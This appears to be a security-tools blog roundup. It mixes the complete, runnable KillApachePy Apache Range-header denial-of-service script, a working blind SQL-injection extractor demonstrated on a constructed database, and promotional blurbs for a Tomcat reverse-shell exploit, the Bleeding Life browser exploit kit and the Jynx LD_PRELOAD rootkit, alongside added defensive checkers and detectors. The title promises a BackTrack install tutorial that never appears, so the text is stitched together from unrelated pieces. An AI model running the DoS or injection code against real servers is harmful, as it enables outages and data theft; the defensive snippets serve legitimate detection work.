How to install BackTrack 5 R3 on an encrypted HDD and get it working with the latest tools
First of all, this is not my work and I will try to mention every source. This is based on one post by Kevin over at www.infosecramblings.com and one by sirwolfgang from disillusion.us.
Second, I know Kali is out, but I'm waiting for a more mature project, as the distribution still has a lot of bugs.
This tutorial is for a 32-bit install, but if you have an IQ greater than 60 I'm sure you'll manage to adapt it. Also, please check that the versions downloaded with wget are the latest.
Apache Tomcat Remote Exploit (PUT request) and Account Scanner
The modified pnscan scanner utility scans a range of IPs to find open Apache Tomcat servers by trying the following login combinations:
- tomcat:tomcat
- password:password
- admin:admin
- admin:password
- admin:<nopass>
- tomcat:<nopass>
The included Perl script can be used to exploit Apache Tomcat servers remotely using the collected login combinations.
It returns a reverse shell as root or SYSTEM, depending on the operating system, or otherwise a reverse shell as the user Tomcat is running as. The exploit might contain Metasploit logic (thanks to jduck).
By Kingcope
Use this tool at your own risk. No source code review has been done (it may contain a hidden shell).
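Since the scanner's source is not reviewed, a defender who wants to know whether their own Tomcat manager would fall to this wordlist is better off checking it themselves. The following is an added example (my own code, not Kingcope's tool): it tries the same default pairs with HTTP Basic auth against the manager URL and reports which ones the server accepts. The in-process "fake manager" is a constructed stand-in that still has tomcat:tomcat, so the block runs offline; the path /manager/html and the 401/403-means-wrong convention are assumptions about a default Tomcat install.

```python
import base64
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError, URLError
from urllib.request import Request, urlopen

# The same default pairs the scanner described above tries ("" = no password).
DEFAULT_CREDS = [
    ("tomcat", "tomcat"), ("password", "password"), ("admin", "admin"),
    ("admin", "password"), ("admin", ""), ("tomcat", ""),
]


def check_manager_creds(host, port, creds=DEFAULT_CREDS, path="/manager/html", timeout=5):
    """Try each user:password with HTTP Basic auth against the Tomcat manager.

    Returns the pairs the server accepted (HTTP 200).  401/403 means "wrong or not
    authorized, try the next pair"; anything else (e.g. 404: manager app not
    deployed, or a connection failure) ends the scan early.
    """
    accepted = []
    for user, password in creds:
        token = base64.b64encode(("%s:%s" % (user, password)).encode()).decode()
        req = Request("http://%s:%d%s" % (host, port, path),
                      headers={"Authorization": "Basic " + token})
        try:
            with urlopen(req, timeout=timeout) as resp:
                if resp.status == 200:
                    accepted.append((user, password))
        except HTTPError as err:
            if err.code not in (401, 403):
                break
        except URLError:
            break
    return accepted


class _FakeManager(BaseHTTPRequestHandler):
    """Constructed stand-in for a Tomcat manager that still accepts tomcat:tomcat (not real Tomcat)."""
    VALID = base64.b64encode(b"tomcat:tomcat").decode()

    def do_GET(self):
        if self.path == "/manager/html" and self.headers.get("Authorization") == "Basic " + self.VALID:
            body = b"<html>Tomcat Web Application Manager</html>"
            self.send_response(200)
        else:
            body = b"401 Unauthorized"
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="Tomcat Manager Application"')
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def demo():
    """Run the credential check against the in-process fake manager; return the accepted pairs."""
    server = HTTPServer(("127.0.0.1", 0), _FakeManager)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return check_manager_creds("127.0.0.1", server.server_address[1])
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(demo())  # [('tomcat', 'tomcat')]
```

Point `check_manager_creds` at a real host only with authorization; a single hit means the manager can be used to deploy a WAR, which is exactly the PUT-based takeover the title refers to.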
Lynis Auditing Tool
Lynis is an auditing tool for Unix specialists. It scans the system and the available software to detect security issues. Besides security-related information, it also collects general system information, installed packages and configuration mistakes.
This software aims to assist with automated auditing, software patch management, and vulnerability and malware scanning of Unix-based systems. It can be run without prior installation, so keeping it on read-only storage (USB stick, CD/DVD) is no problem.
Lynis assists auditors in performing Basel II, GLBA, HIPAA, PCI DSS and SOX (Sarbanes-Oxley) compliance audits.
Intended audience:
Security specialists, penetration testers, system auditors, system/network managers.
Examples of audit tests:
- Available authentication methods
- Expired SSL certificates
- Outdated software
- User accounts without password
- Incorrect file permissions
- Firewall auditing
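Two of the audit tests listed above, accounts without a password and incorrect file permissions, come down to a few lines of parsing. The block below is an added example of that logic (my own code, not Lynis's shell tests): it walks constructed /etc/shadow lines looking for an empty hash field and a past expiry date, and flags world-writable (non-sticky) paths and setuid/setgid binaries from a constructed path-to-mode table. The sample lines and modes are made up for the demo.

```python
import stat
from datetime import date

# Constructed /etc/shadow sample (not from a real host).  Field 2 is the hash:
# "" = no password needed, "!" or "*" = locked, anything else = a hash.
# Field 8 is the account expiry, in days since 1970-01-01 (empty = never).
SAMPLE_SHADOW = """\
root:$6$saltsalt$notarealhashnotarealhashnotarealhash:18500:0:99999:7:::
guest::18500:0:99999:7:::
svc_backup:!:18500:0:99999:7:::
olduser:$6$saltsalt$notarealhashnotarealhashnotarealhash:18500:0:99999:7::18000:
"""

# Constructed path -> mode table standing in for the output of a filesystem walk.
SAMPLE_MODES = {
    "/etc/passwd": 0o644,
    "/etc/shadow": 0o640,
    "/tmp": 0o1777,                  # world-writable but sticky: fine
    "/usr/local/bin/backup": 0o4755,  # setuid root helper
    "/etc/cron.d/nightly": 0o666,     # anyone can edit a cron job
}


def audit_shadow(shadow_text, today=None):
    """Return (user, finding) pairs for empty-password and expired accounts."""
    today = today or date.today()
    days_now = (today - date(1970, 1, 1)).days
    findings = []
    for line in shadow_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 9:
            continue  # not a well-formed shadow entry
        user, pw_hash, expire = fields[0], fields[1], fields[7]
        if pw_hash == "":
            findings.append((user, "empty password"))
        if expire.isdigit() and int(expire) < days_now:
            findings.append((user, "account expired"))
    return findings


def audit_modes(entries):
    """entries: {path: mode bits}.  Flag world-writable paths (unless sticky) and setuid/setgid."""
    findings = []
    for path, mode in entries.items():
        if mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
            findings.append((path, "world-writable"))
        if mode & stat.S_ISUID:
            findings.append((path, "setuid"))
        if mode & stat.S_ISGID:
            findings.append((path, "setgid"))
    return findings


if __name__ == "__main__":
    for finding in audit_shadow(SAMPLE_SHADOW) + audit_modes(SAMPLE_MODES):
        print("WARNING: %s: %s" % finding)
```

On a live host you would feed `audit_shadow` the contents of /etc/shadow (root required) and `audit_modes` the result of an `os.walk` over the paths you care about; locked accounts ("!" or "*") are deliberately not reported, since they cannot log in.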
Supported operating systems
Tested on:
- Arch Linux
- CentOS
- Debian
- Fedora Core 4 and higher
- FreeBSD
- Gentoo
- Knoppix
- Mac OS X
- Mandriva 2007
- OpenBSD 4.x
- OpenSolaris
- OpenSuSE
- PcBSD
- PCLinuxOS
- Red Hat, RHEL 5.x
- Slackware 12.1
- Solaris 10
- Ubuntu
KillApachePy Range Header DoS
If you follow security trends you have probably heard about the DoS attack against many Apache versions that uses a specially crafted Range header (CVE-2011-3192). Based on the original PoC (killapache.pl) I made a Python version, which is more user friendly and has a few workflow enhancements (automatic use of the maximum number of threads the system allows, a custom HTTP method (GET/HEAD/...), a custom target page to retrieve, proxy support, etc.).
P.S. Python v2.5.x to v2.7.x is recommended for running this tool.
[cc lang="python"]#!/usr/bin/env python
import optparse, os, re, socket, threading, time, urllib, urllib2, urlparse

NAME = "KillApachePy (Range Header DoS CVE-2011-3192)"
VERSION = "0.1d"
AUTHOR = "Miroslav Stampar (http://unconciousmind.blogspot.com | @stamparm)"
LICENSE = "Public domain (FREE)"

SLEEP_TIME = 3 # time to wait for new thread slots (after max number reached)
RANGE_NUMBER = 1024 # number of range subitems forming the DoS payload
USER_AGENT = "KillApachePy (%s)" % VERSION

def attack(url, user_agent=None, method='GET', proxy=None):
    url = ("http://%s" % url) if '://' not in url else url
    host = urlparse.urlparse(url).netloc

    if proxy and not re.match('\Ahttp(s)?://[^:]+:[0-9]+(/)?\Z', proxy, re.I):
        print "(x) Invalid proxy address used"
        exit(-1)

    proxy_support = urllib2.ProxyHandler({'http': proxy} if proxy else {})
    opener = urllib2.build_opener(proxy_support)
    urllib2.install_opener(opener)

    class _MethodRequest(urllib2.Request): # Create any HTTP (e.g. HEAD/PUT/DELETE) request type with urllib2
        def set_method(self, method):
            self.method = method.upper()

        def get_method(self):
            return getattr(self, 'method', urllib2.Request.get_method(self))

    def _send(check=False): # Send the vulnerable request to the target
        if check:
            print "(i) Checking target for vulnerability..."

        # "bytes=0-,5-1,5-2,...,5-1023": one open range plus RANGE_NUMBER-1 overlapping ones
        payload = "bytes=0-,%s" % ",".join("5-%d" % item for item in xrange(1, RANGE_NUMBER))

        try:
            headers = { 'Host': host, 'User-Agent': user_agent or USER_AGENT, 'Range': payload, 'Accept-Encoding': 'gzip, deflate' }
            req = _MethodRequest(url, None, headers)
            req.set_method(method)
            response = urllib2.urlopen(req)

            if check:
                # a multipart/byteranges answer (or a 206) means the server honours the crafted ranges
                return response and ('byteranges' in repr(response.headers.headers) or response.code == 206)

        except urllib2.URLError, msg:
            if any([item in str(msg) for item in ('Too many', 'Connection reset')]):
                pass
            elif 'timed out' in str(msg):
                print "\r(i) Server seems to be choked ('%s')" % msg
            else:
                print "(x) Connection error ('%s')" % msg

            if check or 'Forbidden' in str(msg):
                os._exit(-1)

        except Exception, msg:
            raise

    try:
        if not _send(check=True):
            print "(x) Target does not seem to be vulnerable"
        else:
            print "(o) Target seems to be vulnerable\n"

            quit = False

            while not quit:
                threads = []

                print "(i) Creating new threads..."

                try:
                    # keep spawning senders until the interpreter refuses to start another thread
                    while True:
                        thread = threading.Thread(target=_send)
                        thread.start()
                        threads.append(thread)

                except KeyboardInterrupt:
                    quit = True
                    raise

                except Exception, msg:
                    if 'new thread' in str(msg):
                        print "(i) Maximum number of new threads created (%d)" % len(threads)
                    else:
                        print "(x) Exception occurred ('%s')" % msg

                finally:
                    if not quit:
                        print "(o) Waiting for %d seconds to acquire new threads" % SLEEP_TIME
                        time.sleep(SLEEP_TIME)
                        print

    except KeyboardInterrupt:
        print "\r(x) Ctrl-C was pressed"
        os._exit(1)

if __name__ == "__main__":
    print "%s #v%s\n by: %s\n" % (NAME, VERSION, AUTHOR)

    parser = optparse.OptionParser(version=VERSION)
    parser.add_option("-u", dest="url", help="Target url (e.g. \"http://www.target.com/index.php\")")
    parser.add_option("--agent", dest="agent", help="User agent (e.g. \"Mozilla/5.0 (Linux)\")")
    parser.add_option("--method", dest="method", default='GET', help="HTTP method used (default: GET)")
    parser.add_option("--proxy", dest="proxy", help="Proxy (e.g. \"http://127.0.0.1:8118\")")
    options, _ = parser.parse_args()

    if options.url:
        result = attack(options.url, options.agent, options.method, options.proxy)
    else:
        parser.print_help()[/cc]
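The payload the script builds is easy to recognise on the receiving side, which is what the mitigation Apache published at the time did: a `SetEnvIf Range (?:,.*?){5,5} bad-range=1` rule followed by `RequestHeader unset Range env=bad-range` simply counts commas and drops any Range header carrying more than five ranges. The block below is an added example (my own code, not from KillApachePy or Apache) that reproduces the script's header, parses `bytes=` range sets, and classifies a header as ok, too-many or malformed; the threshold of five is the advisory's, and treating a range whose last byte precedes its first byte as malformed is my choice.

```python
import re

# More than this many ranges in one request is treated as abuse.  The Apache advisory's
# SetEnvIf rule matched five commas, i.e. six or more range-specs; this mirrors that.
MAX_RANGES = 5

_RANGE_SPEC = re.compile(r"^(\d*)-(\d*)$")


def build_killapache_range(n=1024):
    """Reproduce the Range header the script above sends: 'bytes=0-,5-1,5-2,...,5-<n-1>'."""
    return "bytes=0-," + ",".join("5-%d" % i for i in range(1, n))


def parse_range_header(value):
    """Parse a 'bytes=' range set into (start, end) tuples; None marks an open bound.

    Raises ValueError for anything outside the byte-range-set grammar, including a
    range-spec whose last-byte-pos precedes its first-byte-pos (the '5-1' items above).
    """
    m = re.match(r"^\s*bytes\s*=\s*(.+?)\s*$", value, re.I)
    if not m:
        raise ValueError("not a bytes= range set")
    ranges = []
    for spec in m.group(1).split(","):
        spec = spec.strip()
        sm = _RANGE_SPEC.match(spec)
        if not sm or spec == "-":
            raise ValueError("bad range-spec %r" % spec)
        start = int(sm.group(1)) if sm.group(1) else None
        end = int(sm.group(2)) if sm.group(2) else None
        if start is not None and end is not None and end < start:
            raise ValueError("last-byte-pos before first-byte-pos in %r" % spec)
        ranges.append((start, end))
    return ranges


def range_header_verdict(value, max_ranges=MAX_RANGES):
    """Classify a Range header as 'ok', 'too-many' or 'malformed'."""
    # Cheap separator count first, exactly the way the SetEnvIf mitigation worked,
    # so a 1024-range header is rejected before anything is parsed.
    if value.count(",") >= max_ranges:
        return "too-many"
    try:
        parse_range_header(value)
    except ValueError:
        return "malformed"
    return "ok"


if __name__ == "__main__":
    for header in ("bytes=0-499,500-999", "bytes=-500", "bytes=0-,5-1", build_killapache_range()):
        print("%-30.30s -> %s" % (header, range_header_verdict(header)))
```

Anything other than "ok" is a candidate for serving the resource without the Range header (a full 200 response) rather than returning an error, which is what the `RequestHeader unset` half of the Apache rule does.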
Joomscan Security Scanner Updated
Joomscan Security Scanner was recently updated with a new database of 550 vulnerabilities. It detects file inclusion, SQL injection and command execution vulnerabilities in a target Joomla web site. The previous update of this tool was in August 2009, with 466 vulnerabilities.
In joomscan you can check for new updates with:
./joomscan.pl check or ./joomscan.pl update
Download for Windows (141 KB)
Download for Linux (150 KB)
pythonsqldumper
This is an open-source SQL dumper written in Python.
Features:
- Database support: MySQL
- Injection methods: inband, blind
- Injection in all parameters sent to the server: GET, POST, headers (Cookie, User-Agent, ...)
- Custom headers
- Supports mod_rewrite injection
- Supports injection in parameters encoded with base64
- Supports proxies (HTTP, SOCKS4, SOCKS5)
- Supports injection over HTTPS through a proxy (SOCKS only)
- Supports custom user-query injection
- Saves all extracted data to a dump file
- Can dump only the structure of the database
- Increases the delay between two consecutive failed requests (lets the server cool down)
- Configurable delay between requests
Bugs and suggestions: tdx_ev@yahoo.com. Download here. Project here.
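Two of the features above, blind injection and injection into base64-encoded parameters, are worth seeing end to end. The block below is an added example (my own code, not pythonsqldumper's): a deliberately vulnerable lookup that base64-decodes a parameter and concatenates it into SQL, against a constructed in-memory SQLite database standing in for the MySQL backend, plus a boolean-blind extractor that recovers a column value by binary search on its length and then on each character's code point. SQLite's length()/substr()/unicode() play the role of MySQL's LENGTH()/SUBSTRING()/ORD(); the table, rows and endpoint are made up for the demo.

```python
import base64
import sqlite3


def build_app_db():
    """Constructed target: an in-memory SQLite database standing in for the MySQL backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, api_key TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 's3cr3t-k3y')")
    conn.execute("INSERT INTO users VALUES (2, 'bob', 'nothing-here')")
    return conn


def vulnerable_profile(conn, id_b64):
    """The vulnerable endpoint (vulnerable on purpose): base64-decodes ?id= and concatenates
    it into the query.  It only reveals whether a row came back, which is all a blind
    boolean injection needs."""
    user_id = base64.b64decode(id_b64).decode()
    rows = conn.execute("SELECT name FROM users WHERE id = " + user_id).fetchall()
    return len(rows) > 0


def blind_extract(oracle, expression, max_len=64):
    """Recover the string value of an SQL expression through a boolean oracle.

    oracle(condition) must answer True/False for 'WHERE <true row> AND <condition>'.
    Binary-searches the length first, then each character's code point (0..127),
    so each character costs about seven requests instead of up to 127.
    """
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle("length((%s)) > %d" % (expression, mid)):
            lo = mid + 1
        else:
            hi = mid
    length = lo

    chars = []
    for pos in range(1, length + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle("unicode(substr((%s), %d, 1)) > %d" % (expression, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars)


def demo():
    """Dump admin's api_key through the base64-wrapped parameter; returns the recovered string."""
    conn = build_app_db()

    def oracle(condition):
        payload = "1 AND " + condition          # id=1 exists, so a row returns iff condition holds
        encoded = base64.b64encode(payload.encode()).decode()  # the "base64-encoded parameter" case
        return vulnerable_profile(conn, encoded)

    return blind_extract(oracle, "SELECT api_key FROM users WHERE name = 'admin'")


if __name__ == "__main__":
    print(demo())  # s3cr3t-k3y
```

The fix on the application side is the usual one: `conn.execute("SELECT name FROM users WHERE id = ?", (user_id,))` with the decoded value bound as a parameter, after which every injected condition is just a string that matches no id.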
ThcSslDOS
Description
THC has released a DoS tool that exploits SSL renegotiation to perform a denial of service against a given SSL server. It uses renegotiation to constantly trigger new SSL handshakes with the server over a single TCP connection. See http://www.thc.org/thc-ssl-dos/. For more information about renegotiation, see InsecureRenegotiation.
Detection
The current version of THC's SSL DoS tool requires the server to honor client-initiated renegotiation in order to work; sslyze reports whether a given server does:
[cc lang="bash"]$ python sslyze.py --reneg www.server.com:443 [/cc]
Recommendation
A mitigation against the current version of THC's SSL DoS tool is to stop the server from honoring client-initiated renegotiation. However, as explained on their website, "The tool can be modified to work without SSL-RENEGOTIATION by just establishing a new TCP connection for every new handshake".
Download here
Bleeding Life – Exploit Pack Released
Bleeding Life 2 is an exploit pack that targets web browsers on the Microsoft Windows operating system with remote-code-execution buffer overflows.
Features:
- Advanced Statistical Information
- Stylish Progress Bars
- Full User-Friendly Admin Panel
- Referer Stats
- Secure Panel - Login/Logout
- Ability To Set and Save Passwords On Panel
- Ability To Allow Guest Access - Guest Can Only View Stats Page, Clicking and Other Pages Disabled
- Ability To Add and/or Remove Exploits Used
- Ability To Add Scan4You Credentials For Built-In Scanner Use
- Ability To Filter Browsers
- Ability To Filter Operating Systems
- Attempt To Detect and Filter HTTP Proxies
- Ability To Blacklist by IP/Range
- Ability To Import Blacklist
- On Panel Built-In Scanner
- Ability To Upload Payload From Panel
- Payload Statistical Information - MD5, Size, SHA1
- Ability To Generate iFrame On Panel / Encrypted
- Ability To Domain Check/Scan On Panel
Info: Before running Bleeding Life 2's installer, you must first fill out config.php, which has been thoroughly commented for your ease of use.
The installer is located at $DOCUMENT_ROOT/install. Installation is incredibly easy.
Server Requirements:
- MySQL
- PHP
- HTTPD (Apache, lighttpd, nginx, etc.)
Jynx Kit (LD_PRELOAD) Userland Rootkit Released
Jynx Kit is an LD_PRELOAD userland rootkit. It is fully undetectable by chkrootkit and Rootkit Hunter. It includes a magic-packet SSL reverse connect-back shell, triggered by the SEQ/ACK numbers of a single packet. A solid building block for further LD_PRELOAD rootkits.
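An LD_PRELOAD rootkit hides files by wrapping libc's readdir/readdir64, which is why tools that list directories through libc (including chkrootkit and Rootkit Hunter, which shell out to ls and friends) see nothing. Asking the kernel directly sidesteps the hook. The block below is an added example of that check (my own code, not part of Jynx Kit or either scanner): it issues the getdents64 syscall through libc's generic syscall(2) entry point, which the preload does not wrap, and diffs the result against os.listdir (readdir). It assumes Linux on x86, x86_64 or aarch64 (the syscall numbers are hard-coded per architecture) and a glibc- or musl-style libc exposing syscall().

```python
import ctypes
import os
import platform
import struct
import tempfile

# Assumption: Linux.  getdents64 syscall numbers for the architectures handled here.
_GETDENTS64 = {"x86_64": 217, "i686": 220, "i386": 220, "aarch64": 61}


def raw_listdir(path):
    """List a directory via the getdents64 syscall, bypassing libc's readdir wrappers."""
    machine = platform.machine()
    if platform.system() != "Linux" or machine not in _GETDENTS64:
        raise RuntimeError("only implemented for Linux x86/x86_64/aarch64")
    libc = ctypes.CDLL(None, use_errno=True)
    libc.syscall.restype = ctypes.c_long

    fd = os.open(path, os.O_RDONLY | os.O_DIRECTORY)
    buf = ctypes.create_string_buffer(64 * 1024)
    names = []
    try:
        while True:
            n = libc.syscall(ctypes.c_long(_GETDENTS64[machine]), ctypes.c_long(fd),
                             buf, ctypes.c_size_t(len(buf)))
            if n < 0:
                err = ctypes.get_errno()
                raise OSError(err, os.strerror(err))
            if n == 0:
                break
            off = 0
            while off < n:
                # struct linux_dirent64 { u64 d_ino; s64 d_off; u16 d_reclen; u8 d_type; char d_name[]; }
                _ino, _doff, reclen, _dtype = struct.unpack_from("<QqHB", buf, off)
                name = ctypes.string_at(ctypes.addressof(buf) + off + 19)  # NUL-terminated d_name
                names.append(os.fsdecode(name))
                off += reclen
    finally:
        os.close(fd)
    return [n for n in names if n not in (".", "..")]


def hidden_entries(path):
    """Names the kernel reports for `path` that libc's readdir (os.listdir) does not."""
    return set(raw_listdir(path)) - set(os.listdir(path))


def self_check():
    """Create a temp dir with known files; on an unhooked libc both views must agree."""
    with tempfile.TemporaryDirectory() as d:
        for name in ("a.txt", "b.txt", ".hidden"):
            open(os.path.join(d, name), "w").close()
        return sorted(raw_listdir(d)), hidden_entries(d)


if __name__ == "__main__":
    for directory in ("/tmp", "/etc", "/usr/lib"):
        missing = hidden_entries(directory)
        print("%-10s %s" % (directory, "clean" if not missing else "HIDDEN: %s" % sorted(missing)))
```

This only catches the file-hiding half of such a kit; a preload can also filter process listings and sockets, so the same idea (raw syscall versus libc view) has to be applied to /proc and /proc/net as well, and a kit that additionally wraps syscall() itself would need a statically linked checker instead of ctypes.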
Gate One – HTML5 web-based SSH client/terminal emulator
Gate One is an HTML5 web-based terminal emulator and SSH client. Top features:
* No browser plugins required!
* Supports multiple simultaneous terminal sessions. As many as your
hardware can handle.
* Users can re-connect to their running terminals whenever they like from
anywhere.
* Can be embedded into other applications. Add a terminal--running whatever
application(s) you want--to your web app! Would be vastly superior to
say, a Java-based serial console applet (hint hint).
* Includes powerful plugin system that supports plugins written in Python,
JavaScript, and even CSS (yes, you can write a CSS-only plugin).
* The Gate One server can be stopped & started without users losing their
running terminal applications (even SSH sessions stay connected!). In
essence, worry-free upgrades!
* The SSH plugin allows users to duplicate sessions without having to
re-enter their username and password (it re-uses the existing SSH tunnel).
* Provides users with the ability to play back and save/share their terminal
sessions via a self-contained HTML playback file.
* Similarly, supports server-side logging, recording, and video-like
playback of user sessions. It can even log to syslog to support
whatever centralized logging system you want.
* Kerberos-based Single Sign-on support is included. It even works with
Active Directory. Other authentication options are available as well.
All documentation is in the "gateone/docs" directory. The HTML documentation is
pre-built and ready-to-read.
IMPORTANT: Gate One is currently IN BETA. Some things may be incomplete or
buggy. Feel free to open new tickets in the issue tracker!
FYI: Gate One was developed entirely by one guy in his spare time over the
course of ~9 months. It turned out pretty good so he's looking to start a
business out of it. What better way to create jobs than to start by creating
one for yourself? All feedback, tips, and advice are appreciated:
daniel.mcdougall@liftoffsoftware.com
NOTE: http://liftoffsoftware.com/ hasn't been built yet so links pointing there
will be dead for a while.
